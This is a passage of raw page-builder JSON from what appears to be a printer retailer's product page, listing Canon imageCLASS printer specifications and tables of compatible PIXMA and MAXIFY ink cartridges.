MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\\n\\n<\\/div>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>First Print Out Time (A4): Approx. 6.5 sec<\\/li>\\n \\t<li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n \\t<li>Mobile Printing<\\/li>\\n<\\/ul><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dfd3898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n\\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 43ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li>\\n \\t<li>FPOT: 6.2secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 2,300 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f0eb648\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p>\\n\\n<\\/div>\\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 38ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 750 - 4,000 pages<\\/li>\\n \\t<li>FPOT: 5.5secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 900 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a7e17a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><table border=\\\"1\\\" width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><strong>Model<\\/strong><\\/td><td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td><\\/tr><tr><td rowspan=\\\"13\\\" align=\\\"center\\\">imagePROGRAF PRO-500<\\/td><td>Maintenance Cartridge MC-20<\\/td><\\/tr><tr><td>PFI-50 (Blue)<\\/td><\\/tr><tr><td>PFI-50 (Chroma Optimizer)<\\/td><\\/tr><tr><td>PFI-50 (Cyan)<\\/td><\\/tr><tr><td>PFI-50 (Gray)<\\/td><\\/tr><tr><td>PFI-50 (Magenta)<\\/td><\\/tr><tr><td>PFI-50 (Matte Black)<\\/td><\\/tr><tr><td>PFI-50 (Photo Black)<\\/td><\\/tr><tr><td>PFI-50 (Photo Cyan)<\\/td><\\/tr><tr><td>PFI-50 (Photo Gray)<\\/td><\\/tr><tr><td>PFI-50 (Photo Magenta)<\\/td><\\/tr><tr><td>PFI-50 (Red)<\\/td><\\/tr><tr><td>PFI-50 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY iB4170<\\/td><td>PGI-2700 (Black)<\\/td><\\/tr><tr><td>PGI-2700 (Cyan)<\\/td><\\/tr><tr><td>PGI-2700 (Magenta)<\\/td><\\/tr><tr><td>PGI-2700 (Yellow)<\\/td><\\/tr><tr><td>PGI-2700XL (Black)<\\/td><\\/tr><tr><td>PGI-2700XL (Cyan)<\\/td><\\/tr><tr><td>PGI-2700XL (Magenta)<\\/td><\\/tr><tr><td>PGI-2700XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5070<\\/td><td>PGI-2700 (Black)<\\/td><\\/tr><tr><td>PGI-2700 (Cyan)<\\/td><\\/tr><tr><td>PGI-2700 (Magenta)<\\/td><\\/tr><tr><td>PGI-2700 (Yellow)<\\/td><\\/tr><tr><td>PGI-2700XL (Black)<\\/td><\\/tr><tr><td>PGI-2700XL (Cyan)<\\/td><\\/tr><tr><td>PGI-2700XL (Magenta)<\\/td><\\/tr><tr><td>PGI-2700XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5170<\\/td><td>PGI-2700 (Black)<\\/td><\\/tr><tr><td>PGI-2700 (Cyan)<\\/td><\\/tr><tr><td>PGI-2700 (Magenta)<\\/td><\\/tr><tr><td>PGI-2700 (Yellow)<\\/td><\\/tr><tr><td>PGI-2700XL (Black)<\\/td><\\/tr><tr><td>PGI-2700XL (Cyan)<\\/td><\\/tr><tr><td>PGI-2700XL (Magenta)<\\/td><\\/tr><tr><td>PGI-2700XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5370<\\/td><td>PGI-2700 (Black)<\\/td><\\/tr><tr><td>PGI-2700 (Cyan)<\\/td><\\/tr><tr><td>PGI-2700 (Magenta)<\\/td><\\/tr><tr><td>PGI-2700 (Yellow)<\\/td><\\/tr><tr><td>PGI-2700XL (Black)<\\/td><\\/tr><tr><td>PGI-2700XL (Cyan)<\\/td><\\/tr><tr><td>PGI-2700XL (Magenta)<\\/td><\\/tr><tr><td>PGI-2700XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5470<\\/td><td>PGI-2700 (Black)<\\/td><\\/tr><tr><td>PGI-2700 (Cyan)<\\/td><\\/tr><tr><td>PGI-2700 (Magenta)<\\/td><\\/tr><tr><td>PGI-2700 (Yellow)<\\/td><\\/tr><tr><td>PGI-2700XL (Black)<\\/td><\\/tr><tr><td>PGI-2700XL (Cyan)<\\/td><\\/tr><tr><td>PGI-2700XL (Magenta)<\\/td><\\/tr><tr><td>PGI-2700XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E3170<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E410<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><\\/tbody><\\/table>\",\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\"><tbody><tr><td width=\\\"170\\\"><strong>Model<\\/strong><\\/td><td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E4270<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E470<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E477<\\/td><td>CL-57S (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E480<\\/td><td>CL-57 (Colour)<\\/td><\\/tr><tr><td>PG-47 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E510<\\/td><td>CL-98 (Colour)<\\/td><\\/tr><tr><td>PG-88 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560<\\/td><td>CL-99 (Colour)<\\/td><\\/tr><tr><td>PG-89 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560 \\/ E560R<\\/td><td>CL-99 (Colour)<\\/td><\\/tr><tr><td>PG-89 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1000<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1010<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G2010<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3000<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3010<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G4010<\\/td><td>GI-790 (Black)<\\/td><\\/tr><tr><td>GI-790 (Cyan)<\\/td><\\/tr><tr><td>GI-790 (Magenta)<\\/td><\\/tr><tr><td>GI-790 (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP100<\\/td><td>CLI-36 (Colour)<\\/td><\\/tr><tr><td>PGI-35 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110<\\/td><td>CLI-36 (Colour)<\\/td><\\/tr><tr><td>PGI-35 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110 (with battery)<\\/td><td>CLI-36 (Colour)<\\/td><\\/tr><tr><td>PGI-35 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA iP1300<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA iP2770 \\/ iP2772<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA iP2870S<\\/td><td>CL-746 (Colour)<\\/td><\\/tr><tr><td>CL-746S (Colour)<\\/td><\\/tr><tr><td>PG-745 (Pigment Black)<\\/td><\\/tr><tr><td>PG-745S (Pigment Black)<\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"  <table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n    <tbody>\\n    <tr>\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA iP4200<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA iP7270<\\/td>\\n      <td>CLI-751 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-750 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-750XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"12\\\" align=\\\"center\\\">PIXMA iP8770<\\/td>\\n      <td>CLI-751 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-750 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-750XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6770<\\/td>\\n      <td>CLI-751 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-750 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-750XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-755XXL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6870<\\/td>\\n      <td>CLI-751 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-750 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-750XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-755XXL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2570S<\\/td>\\n      <td>CL-746 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-746S (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-746XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745S (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2577S<\\/td>\\n      <td>CL-746 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-746S (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-746XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745S (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <\\/tbody>\\n  <\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 